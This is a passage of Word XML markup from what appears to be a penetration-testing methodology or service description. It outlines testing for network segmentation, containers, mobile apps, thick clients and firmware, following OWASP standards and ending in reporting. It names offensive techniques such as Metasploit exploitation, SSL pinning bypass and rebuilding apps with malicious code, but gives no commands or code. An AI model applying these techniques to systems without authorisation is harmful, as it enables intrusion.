                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t>may not detect</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">      •</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:tab/>
              <w:t>Exploiting the vulnerabilities using Metasploit and manual techniques</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t>►  Reporting</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t>Easy to consume executive summary and detailed findings report prepared by documenting the findings based on CVSS scoring along with risk assessment and fix recommendation, including steps that can be taken to mitigate each vulnerability.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t>In addition to network tests, Segmentation and Container testing may also be required involving other specific tests.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t>Segmentation Testing</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  -</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:tab/>
              <w:t>Identify the segments that need to be tested. PCI classification of Network</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t>segments include CDE, Non-CDE and Out-of-scope segments.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  -</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:tab/>
              <w:t>Perform UDP, TCP and ICMP scans from each segment to test for reachability</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  -</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:tab/>
              <w:t>Perform Segment bypass by crafting custom packets.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">  -</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:tab/>
              <w:t>Identify the non-compliant segments and report it.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t>Container Testing</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  -</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:tab/>
              <w:t>Identify the target container infrastructure, including the container runtime,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">orchestration tool, and underlying infrastructure. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  -</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">Container Image analysis: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Analyze</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> the container images to identify any vulnerabilities, including outdated software versions, unpatched</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t>vulnerabilities and other security issues.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  -</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:tab/>
              <w:t>Container Runtime testing: memory leakages, namespace conflicts, container breakout scenarios etc.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  -</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:tab/>
              <w:t>Container Orchestration testing: Test the container orchestration tool to</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t>identify any vulnerabilities, including misconfigurations, privilege escalation,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">and other security issues.  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve"> Network tests: Test the container network configuration to identify any</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t>vulnerabilities, including misconfigurations, insecure communication channels,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t>and other security issues.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">  -</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:tab/>
              <w:t>Reporting as mentioned earlier.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="4E75C2D7" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="236760CE" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Mobile Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FF98B90" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC"/>
          <w:p w14:paraId="336BED27" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="124"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>PTC follows a customized pen test strategy based on OWASP Mobile Application Security Verification Standard</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">► Information Gathering </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">Gather scope via questionnaire, mobile application demo by product team, review of threat Model, source scan reports, CVE info etc.  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t>►  Scanning and vulnerability assessment</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve"> Scan the application binary/installer using appropriate security scanning tools depending on feasibility, false positive analysis, identifying attack surface</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">►  Manual testing and exploitation </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t>Extensive manual tests are performed in the following areas with additional focus on newly found vulnerabilities in the market</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">      •</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:tab/>
              <w:t>Authentication, Authorization and Session Management</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">      •</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">Input Validation </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">      •</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:tab/>
              <w:t>Binary Analysis – insecure data Storage and Client code quality</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">      •</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">Security configuration </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">      •</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:tab/>
              <w:t>Business Logic</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">      •</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:tab/>
              <w:t>Testing SSL pinning - bypass SSL pinning and certificate checks</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">      •</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">Reverse-Engineering </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">               - Code Obfuscation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">               - Decompiling and/or Disassembly</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">               - Rebuilding with modified/malicious code </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t>► Reporting</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:br/>
              <w:t>Easy to consume executive summary and detailed findings report prepared by documenting the findings based on CVSS scoring along with risk assessment and fix recommendation, including steps that can be taken to mitigate each vulnerability.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="683B9C89" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16C08B7F" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Thick Client</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73B4555C" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:left="124"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>PTC follows a customized pen test strategy based on OWASP Thick Client Security Testing Guide</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t>► Information Gathering</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t>Gather scope via questionnaire, thick client demo by product team, review of threat Model, source scan reports, CVE info etc.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t>► Scanning and vulnerability assessment</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t>Automated scans using Burp Suite, Zap etc., false positive analysis, identifying attack surface</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t>► Manual testing and exploitation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">Extensive manual tests are performed in the following areas </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        •</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>Authentication, Authorization and Session Management</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        •</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>Input Validation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        •</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>Error Handling</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        •</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">Binary Analysis – insecure data Storage, memory analysis </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        •</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>Security configuration</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        •</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
              <w:t>Business Logic</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t>► Reporting</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t>Easy to consume executive summary and detailed findings report prepared by documenting the findings based on CVSS scoring along with risk assessment and fix recommendation, including steps that can be taken to mitigate each vulnerability.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="20C0147F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51F1262F" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Firmware</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B52C0ED" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:left="124"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>PTC follows a customized pen test strategy based on OWASP FSTM &amp; OWASP ISVS methodology</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t>► Information Gathering and reconnaissance</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">Gather scope via questionnaire, acquire related technical and documentation </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>details pertaining to the target device's firmware.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">► Obtaining and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Analyzing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> firmware</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">Obtain firmware from vendor portal or other preferred ways and explore aspects of the file to identify its characteristics such as potential root filesystem metadata, and gain additional understanding of the platform it's compiled for. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">► Extracting and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Analyzing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> filesystem contents</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        •</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:tab/>
